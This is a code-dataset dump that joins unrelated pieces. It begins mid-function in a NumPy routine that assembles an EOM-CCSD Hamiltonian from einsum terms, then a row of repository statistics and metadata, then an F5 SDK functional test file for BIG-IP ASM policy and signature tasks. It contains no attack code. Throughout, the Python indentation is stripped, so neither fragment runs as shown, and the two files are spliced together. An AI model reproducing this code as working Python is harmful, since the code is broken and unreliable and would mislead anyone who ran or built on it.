Hdd += 1.000000000000000 * einsum('fb,nj,ikca,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<j,k||c,b>*t1(c,m)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,ni,jkcb,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*<i,k||c,b>*t1(c,m)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,nj,ikcb,cm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(n,i)*<j,k||c,a>*t1(c,m)*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,ni,jkca,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(n,j)*<i,k||c,a>*t1(c,m)*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,nj,ikca,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<j,k||c,b>*t1(c,m)*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,ni,jkcb,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,j)*<i,k||c,b>*t1(c,m)*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,nj,ikcb,cm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(n,j)*d(m,i)*<l,k||a,b>*t1(e,k)*t1(f,l)
Hdd += -1.000000000000000 * einsum('nj,mi,lkab,ek,fl->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(m,j)*d(n,i)*<l,k||a,b>*t1(e,k)*t1(f,l)
Hdd += 1.000000000000000 * einsum('mj,ni,lkab,ek,fl->efmnabij', kd[o, o], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
return H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd
def pack_eom_ccsd_H(H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd, nsocc, nsvirt):
dim = int(1 + nsvirt*(nsvirt-1)/2*nsocc*(nsocc-1)/2 + nsvirt*nsocc)
H = np.zeros((dim,dim))
# 00 block
H[0,0] = H00
# 0s, s0 blocks
for a in range (0,nsvirt):
for i in range (0,nsocc):
ai = 1 + a*nsocc + i
H[ai,0] = Hs0[a,i]
H[0,ai] = H0s[a,i]
# ss block
for a in range (0,nsvirt):
for i in range (0,nsocc):
ai = 1 + a*nsocc + i
for e in range (0,nsvirt):
for m in range (0,nsocc):
em = 1 + e*nsocc + m
H[ai,em] = Hss[a,i,e,m]
# sd, ds blocks
for a in range (0,nsvirt):
for i in range (0,nsocc):
ai = 1 + a*nsocc + i
efmn = 1 + nsocc*nsvirt
for e in range (0,nsvirt):
for f in range (e+1,nsvirt):
for m in range (0,nsocc):
for n in range (m+1,nsocc):
H[ai,efmn] = Hsd[a,i,e,f,m,n]
H[efmn,ai] = Hds[e,f,m,n,a,i]
efmn += 1
# 0d, d0 blocks
abij = 1 + nsocc*nsvirt
for a in range (0,nsvirt):
for b in range (a+1,nsvirt):
for i in range (0,nsocc):
for j in range (i+1,nsocc):
H[abij,0] = Hd0[a,b,i,j]
H[0,abij] = H0d[a,b,i,j]
abij += 1
# dd blocks
abij = 1 + nsocc*nsvirt
for a in range (0,nsvirt):
for b in range (a+1,nsvirt):
for i in range (0,nsocc):
for j in range (i+1,nsocc):
efmn = 1 + nsocc*nsvirt
for e in range (0,nsvirt):
for f in range (e+1,nsvirt):
for m in range (0,nsocc):
for n in range (m+1,nsocc):
H[abij,efmn] = Hdd[a,b,i,j,e,f,m,n]
efmn += 1
abij += 1
return H
def build_eom_ccsd_H(f, g, o, v, t1, t2, nsocc, nsvirt):
kd = np.zeros((nsocc+nsvirt,nsocc+nsvirt))
for i in range (0,nsocc+nsvirt):
kd[i,i] = 1.0
H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd = build_eom_ccsd_H_by_block(kd,f, g, o, v, t1, t2)
H = pack_eom_ccsd_H(H00, Hs0, H0s, Hd0, H0d, Hss, Hsd, Hds, Hdd, nsocc, nsvirt)
return H
| 66.273188 | 225 | 0.508206 | 19,198 | 91,457 | 2.393531 | 0.018544 | 0.032426 | 0.142587 | 0.041392 | 0.953124 | 0.937695 | 0.913843 | 0.885574 | 0.844182 | 0.803922 | 0 | 0.168836 | 0.191839 | 91,457 | 1,379 | 226 | 66.321247 | 0.452863 | 0.204883 | 0 | 0.159763 | 0 | 0 | 0.185434 | 0.089625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005917 | false | 0 | 0.003945 | 0 | 0.015779 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5bd059b5f4c7a944020810a86b2965b4db2a1be5 | 32,679 | py | Python | f5/bigip/tm/asm/test/functional/test_tasks.py | nghia-tran/f5-common-python | acb23a6e5830a119b460c19a578654113419f5c3 | [
"Apache-2.0"
] | 272 | 2016-02-23T06:05:44.000Z | 2022-02-20T02:09:32.000Z | f5/bigip/tm/asm/test/functional/test_tasks.py | nghia-tran/f5-common-python | acb23a6e5830a119b460c19a578654113419f5c3 | [
"Apache-2.0"
] | 1,103 | 2016-02-11T17:48:03.000Z | 2022-02-15T17:13:37.000Z | f5/bigip/tm/asm/test/functional/test_tasks.py | nghia-tran/f5-common-python | acb23a6e5830a119b460c19a578654113419f5c3 | [
"Apache-2.0"
] | 167 | 2016-02-11T17:48:21.000Z | 2022-01-17T20:13:05.000Z | # Copyright 2015 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pytest
import tempfile
import time
from distutils.version import LooseVersion
from f5.bigip.tm.asm.tasks import Apply_Policy
from f5.bigip.tm.asm.tasks import Check_Signature
from f5.bigip.tm.asm.tasks import Export_Policy
from f5.bigip.tm.asm.tasks import Export_Signature
from f5.bigip.tm.asm.tasks import Import_Policy
from f5.bigip.tm.asm.tasks import Import_Vulnerabilities
from f5.bigip.tm.asm.tasks import Update_Signature
from f5.sdk_exception import MissingRequiredCreationParameter
from f5.sdk_exception import UnsupportedOperation
from jinja2 import Environment
from jinja2 import FileSystemLoader
from requests.exceptions import HTTPError
if LooseVersion(pytest.config.getoption('--release')) >= LooseVersion('12.1.0'):
SCAN = 'trustwave'
else:
SCAN = 'cenzic-hailstorm'
F = ''
def file_read():
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
dirpath = os.path.dirname(__file__)
path = os.path.join(dirpath, 'test_files')
loader = FileSystemLoader(path)
env = Environment(
loader=loader
)
template = env.get_template('fake_policy.xml')
result = template.render(fake_policy=name)
return result
def remove_policies(mgmt_root, policy=None):
policies = mgmt_root.tm.asm.policies_s.get_collection()
if policy is None:
resources = policies
else:
resources = [p for p in policies if p.name == policy]
for resource in resources:
resource.delete()
@pytest.fixture(scope='function')
def partition(mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
partitions = mgmt_root.tm.auth.partitions.partition
local = partitions.create(name=name)
yield local
local.delete()
@pytest.fixture(scope='function')
def check_sig(mgmt_root):
task = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def update_sig(mgmt_root):
task = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.fetch()
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def export_basic(mgmt_root):
task = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename='fake_export.xml'
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def set_policy(mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
pol1 = mgmt_root.tm.asm.policies_s.policy.create(
name=name
)
pol1.vulnerability_assessment.modify(scannerType=SCAN)
yield pol1.selfLink
@pytest.fixture(scope='function')
def set_policy2(mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
pol1 = mgmt_root.tm.asm.policies_s.policy.create(
name=name
)
yield pol1.selfLink
pol1.delete()
@pytest.fixture(scope='function')
def apply_policy(mgmt_root, set_policy2):
reference = {'link': set_policy2}
task = mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.create(
policyReference=reference
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def export_policy(mgmt_root, set_policy2):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
filename=name + '.xml',
policyReference=reference
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield exp1
exp1.delete()
@pytest.fixture(scope='function')
def export_policy_inline(mgmt_root, set_policy2):
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
inline=True,
policyReference=reference
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield exp1
exp1.delete()
@pytest.fixture(scope='function')
def import_policy_base64(mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name,
isBase64=True
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_policy_template(mgmt_root):
tmpl = mgmt_root.tm.asm.policy_templates_s.get_collection()
link = {'link': tmpl[0].selfLink}
f = tempfile.NamedTemporaryFile()
name = os.path.basename(f.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
policyTemplateReference=link,
name=name,
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_policy(mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_partitioned_policy(mgmt_root, partition):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
fullPath='/{0}/{1}'.format(partition.name, name)
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_partitioned_policy2(mgmt_root, partition):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name,
partition=partition.name
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
@pytest.fixture(scope='function')
def import_vuln(mgmt_root, set_policy):
reference = {'link': set_policy}
imports = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
content = file_read()
file = tempfile.NamedTemporaryFile()
fh = open(file.name, 'w')
fh.write(content)
fh.close()
mgmt_root.tm.asm.file_transfer.uploads.upload_file(file.name)
task = imports.import_vulnerabilities.create(
filename=file.name,
policyReference=reference,
importAllDomainNames=True
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
yield task
task.delete()
class TestApplyPolicy(object):
def test_create_req_arg(self, apply_policy, set_policy2):
reference = {'link': set_policy2}
ap = apply_policy
assert ap.status == 'COMPLETED'
assert ap.kind == 'tm:asm:tasks:apply-policy:apply-policy-taskstate'
assert ap.policyReference == reference
def test_refresh(self, apply_policy, set_policy2):
reference = {'link': set_policy2}
ap = apply_policy
hashid = str(ap.id)
link = ap.selfLink
ap.refresh()
assert ap.kind == 'tm:asm:tasks:apply-policy:apply-policy-taskstate'
assert ap.policyReference == reference
assert ap.id == hashid
assert ap.selfLink == link
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.load(
id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, apply_policy, mgmt_root):
ap = apply_policy
ap2 = mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.load(id=ap.id)
assert ap.id == ap2.id
assert ap.selfLink == ap2.selfLink
assert ap.policyReference == ap2.policyReference
def test_exists(self, apply_policy):
ap = apply_policy
hashid = str(ap.id)
assert ap.exists(id=hashid)
def test_delete(self, mgmt_root, set_policy2):
reference = {'link': set_policy2}
task = mgmt_root.tm.asm.tasks.apply_policy_s.apply_policy.create(
policyReference=reference
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
task.delete()
assert task.__dict__['deleted']
def test_apply_policy_collection(self, mgmt_root, apply_policy, set_policy2):
reference = {'link': set_policy2}
ap = apply_policy
assert ap.status == 'COMPLETED'
assert ap.kind == 'tm:asm:tasks:apply-policy:apply-policy-taskstate'
assert ap.policyReference == reference
col = mgmt_root.tm.asm.tasks.apply_policy_s.get_collection()
assert isinstance(col, list)
assert len(col)
assert isinstance(col[0], Apply_Policy)
class TestExportPolicy(object):
def test_create_req_arg(self, export_policy):
exp1 = export_policy
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri+endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is False
def test_create_inline_export(self, export_policy_inline):
exp1 = export_policy_inline
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri+endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is True
def test_create_optional_args(self, mgmt_root, set_policy2):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
filename=name + '.xml',
policyReference=reference,
inline=True
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri + endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is True
def test_refresh(self, export_policy, mgmt_root):
exp1 = export_policy
exp2 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
exp1.refresh()
assert exp1.selfLink == exp2.selfLink
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, export_policy, mgmt_root):
exp1 = export_policy
exp2 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
def test_delete(self, mgmt_root, set_policy2):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
reference = {'link': set_policy2}
exp1 = mgmt_root.tm.asm.tasks.export_policy_s.export_policy.create(
filename=name + '.xml',
policyReference=reference
)
while True:
exp1.refresh()
if exp1.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
hashid = str(exp1.id)
exp1.delete()
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id=hashid)
assert err.value.response.status_code == 404
def test_policy_export_collection(self, export_policy, mgmt_root):
exp1 = export_policy
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri + endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is False
sc = mgmt_root.tm.asm.tasks.export_policy_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Export_Policy)
class TestImportPolicy(object):
def test_create_req_arg(self, import_policy):
imp1 = import_policy
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
def test_create_import_template(self, import_policy_template):
imp1 = import_policy_template
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
def test_create_import_partitioned(self, mgmt_root, import_partitioned_policy):
imp1 = import_partitioned_policy
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
remove_policies(mgmt_root, os.path.basename(imp1.fullPath))
def test_create_import_partitioned2(self, mgmt_root, import_partitioned_policy2):
imp1 = import_partitioned_policy2
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
remove_policies(mgmt_root, os.path.basename(imp1.fullPath))
def test_create_import_fails(self, import_policy_base64):
imp1 = import_policy_base64
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.status == 'FAILURE'
def test_create_optional_args(self, mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
imp1 = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
isBase64=True,
name=name
)
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri+endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'NEW'
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is True
def test_refresh(self, import_policy, mgmt_root):
imp1 = import_policy
imp2 = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
imp1.refresh()
assert imp1.selfLink == imp2.selfLink
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, import_policy, mgmt_root):
imp1 = import_policy
imp2 = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
def test_delete(self, mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
hash_id = task.id
task.delete()
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(
id=hash_id
)
assert err.value.response.status_code == 404
def test_policy_import_collection(self, import_policy, mgmt_root):
imp1 = import_policy
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri+endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
sc = mgmt_root.tm.asm.tasks.import_policy_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Import_Policy)
class TestCheckSignature(object):
def test_fetch(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/check-signatures/'
final_uri = base_uri + endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status == 'NEW'
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:check-signatures:check-signatures-taskstate'
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.load(
id='Lx3553-321'
)
assert err.value.response.status_code == 404
def test_load(self, check_sig, mgmt_root):
chk1 = check_sig
hashid = str(chk1.id)
t1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.load(id=hashid)
assert t1.id == chk1.id
assert t1.selfLink == chk1.selfLink
def test_exists(self, check_sig):
chk1 = check_sig
hashid = str(chk1.id)
assert chk1.exists(id=hashid)
def test_refresh(self, check_sig):
chk1 = check_sig
hashid = str(chk1.id)
link = chk1.selfLink
chk1.refresh()
assert chk1.id == hashid
assert chk1.selfLink == link
def test_delete(self, mgmt_root):
task = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
task.delete()
assert task.__dict__['deleted']
def test_signature_update_collection(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/check-signatures/'
final_uri = base_uri+endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status == 'NEW'
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:check-signatures:check-signatures-taskstate'
sc = mgmt_root.tm.asm.tasks.check_signatures_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Check_Signature)
class TestExportSignature(object):
def test_create_req_arg(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml'
)
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-signatures/'
final_uri = base_uri+endpoint
assert exp1.filename == name + '.xml'
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'NEW'
assert exp1.kind == 'tm:asm:tasks:export-signatures:export-signatures-taskstate'
assert exp1.inline is False
def test_create_optional_args(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml',
inline=True
)
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-signatures/'
final_uri = base_uri + endpoint
assert exp1.filename == name + '.xml'
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'NEW'
assert exp1.kind == 'tm:asm:tasks:export-signatures:export-signatures-taskstate'
assert exp1.inline is True
def test_refresh(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml'
)
exp2 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
exp1.refresh()
assert exp1.selfLink == exp2.selfLink
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, export_basic, mgmt_root):
exp1 = export_basic
exp2 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
def test_delete(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml'
)
hashid = str(exp1.id)
exp1.delete()
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(
id=hashid
)
assert err.value.response.status_code == 404
def test_signature_export_collection(self, export_basic, mgmt_root):
exp1 = export_basic
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-signatures/'
final_uri = base_uri + endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-signatures:export-signatures-taskstate'
sc = mgmt_root.tm.asm.tasks.export_signatures_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Export_Signature)
@pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release')) < LooseVersion('12.0.0'),
reason='This collection is completely broken on 11.6.0.'
)
class TestUpdateSignature(object):
def test_fetch(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/update-signatures/'
final_uri = base_uri+endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status in ['COMPLETED', 'NEW']
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:update-signatures:update-signatures-taskstate'
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.load(
id='Lx3553-321'
)
assert err.response.status_code == 404
def test_load(self, update_sig, mgmt_root):
chk1 = update_sig
hashid = str(chk1.id)
time.sleep(6)
t1 = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.load(id=hashid)
assert t1.id == chk1.id
assert t1.selfLink == chk1.selfLink
def test_exists(self, update_sig):
chk1 = update_sig
hashid = str(chk1.id)
assert chk1.exists(id=hashid)
def test_refresh(self, update_sig):
chk1 = update_sig
hashid = str(chk1.id)
link = chk1.selfLink
chk1.refresh()
assert chk1.id == hashid
assert chk1.selfLink == link
def test_delete(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
chk1.delete()
assert chk1.__dict__['deleted']
def test_signature_update_collection(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/update-signatures/'
final_uri = base_uri + endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status in ['COMPLETED', 'NEW']
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:update-signatures:update-signatures-taskstate'
sc = mgmt_root.tm.asm.tasks.update_signatures_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Update_Signature)
@pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release')) < LooseVersion('11.6.0'),
reason='This collection is fully implemented on 11.6.0 or greater.'
)
class TestImportVulnerabilities(object):
def test_modify_raises(self, mgmt_root):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
with pytest.raises(UnsupportedOperation):
rc.import_vulnerabilities.modify()
